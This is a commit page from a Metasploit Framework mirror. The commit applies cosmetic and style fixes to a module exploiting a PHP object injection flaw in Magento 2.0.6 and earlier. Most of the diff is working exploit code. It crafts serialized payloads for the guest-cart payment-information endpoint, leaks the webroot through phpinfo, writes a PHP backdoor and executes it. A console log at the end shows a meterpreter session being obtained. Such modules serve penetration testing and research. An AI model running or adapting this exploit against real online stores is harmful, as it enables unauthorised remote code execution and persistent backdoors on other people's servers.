infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Cosmetic changes for magento_unserialize to pass msftidy & guidelines

bug/bundler_fix
wchen-r7 2016-06-02 16:34:41 -05:00
parent 4f42cc8c08
commit 7c9227f70b
1 changed files with 56 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

94
modules/exploits/multi/http/magento_unserialize.rb
View File

@ -13,20 +13,22 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Magento <= 2.0.6 Unserialize Remote Code Execution',
'Name' => 'Magento 2.0.6 Unserialize Remote Code Execution',
'Description' => %q{
This module exploits a PHP object injection vulnerability in Magento <= 2.0.6
This module exploits a PHP object injection vulnerability in Magento 2.0.6
or prior.
},
'Platform' => 'php',
'License' => MSF_LICENSE,
'Author' => [
'Author' =>
[
'Netanel Rubin', # original discovery
'agix', # original exploit
'mr_me <mr_me@offensive-security.com>', # metasploit module
],
'mr_me <mr_me[at]offensive-security.com>', # metasploit module
],
'Payload' =>
{
'BadChars' => "\x22",
'BadChars' => "\x22",
},
'References' =>
[
@ -36,16 +38,21 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
],
'Arch' => ARCH_PHP,
'Targets' => [
'Targets' =>
[
[ 'Automatic Targeting', { 'auto' => true } ],
],
],
'DisclosureDate' => 'May 17 2016',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
], self.class)
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
], self.class)
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def get_phpinfo
@ -149,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}'
return serialize
serialize
end
def get_phpshell
@ -252,14 +260,16 @@ class MetasploitModule < Msf::Exploit::Remote
serialize << 's:18:\"\u0000*\u0000renamedCommands\";N;'
serialize << 's:11:\"\u0000*\u0000requests\";'
serialize << 'i:0;}'
return serialize
serialize
end
def do_check
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}"
return send_request_cgi({
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json',
@ -271,9 +281,9 @@ class MetasploitModule < Msf::Exploit::Remote
@phpsessid = Rex::Text.rand_text_alphanumeric(26)
@form_key = Rex::Text.rand_text_alphanumeric(26)
@cookies = "PHPSESSID=#{@phpsessid}; form_key=#{@form_key}"
@email = "#{@phpsessid}@#{@form_key}.com"
@email = "#{@phpsessid}@#{@form_key}.com"
end
def check
define_globals
# we actually exploit the bug, but just for a callback
@ -293,16 +303,19 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
end
rescue ::Rex::ConnectionError
rescue ::Rex::ConnectionError => e
vprint_error(e.message)
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def get_webroot
data = '{"paymentMethod":{"method":"checkmo","additional_data":{"additional_information":"'
data << get_phpinfo
data << "\"}},\"email\":\"#{@email}\"}"
# we steal path via phpinfo
res = send_request_cgi({
'method' => 'POST',
@ -310,13 +323,15 @@ class MetasploitModule < Msf::Exploit::Remote
'ctype' => 'application/json',
'data' => data,
})
if res and res.code == 200
if res && res.code == 200
@webroot = "#{$1}" if res.body =~ /_SERVER\["DOCUMENT_ROOT"\]<\/td><td class="v">(.*)<\/td><\/tr>/
return true
end
return false
false
end
def create_fake_cart
res = send_request_cgi({
'method' => 'GET',
@ -325,10 +340,10 @@ class MetasploitModule < Msf::Exploit::Remote
'cookie' => @cookies,
'vars_get' => { 'form_key' => @form_key }
})
if (res and res.body.include?('[]'))
return true
end
return false
return true if (res && res.body.include?('[]'))
false
end
def generate_cart_id
@ -337,27 +352,29 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, '/checkout/cart/'),
'cookie' => @cookies,
})
if res and res.code == 200
if res && res.code == 200
@guest_cart_id = "#{$1}" if res.body =~ /entity_id":"(.*)","store_id":\d,"created_at/
return true
end
return false
false
end
def backdoor
data = "{\"paymentMethod\":{\"method\":\"checkmo\",\"additional_data\":{\"additional_information\":\""
data << get_phpshell
data << "\"}},\"email\":\"#{@email}\"}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/rest/V1/guest-carts/#{@guest_cart_id}/set-payment-information"),
'ctype' => 'application/json',
'data' => data,
})
if (res && res.body.include?('true'))
return true
end
return false
return true if (res && res.body.include?('true'))
false
end
def exec_code
@ -366,21 +383,22 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/#{@backdoor}"),
}, timeout = 0.5)
end
def exploit
define_globals
@backdoor = "#{Rex::Text.rand_text_alphanumeric(26)}.php"
register_files_for_cleanup("#{@backdoor}")
if create_fake_cart && generate_cart_id
print_good("generated a guest cart id")
if get_webroot
if backdoor
print_good("backdoor done!")
exec_code
end
if get_webroot && backdoor
print_good("backdoor done!")
exec_code
end
end
end
end
=begin
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/sam.rc
[*] Processing scripts/sam.rc for ERB directives.
@ -404,4 +422,4 @@ resource (scripts/sam.rc)> exploit
[+] Deleted vYtP1aJ2NXYAovrQgOLNGCt0SZ.php
meterpreter >
=end
=end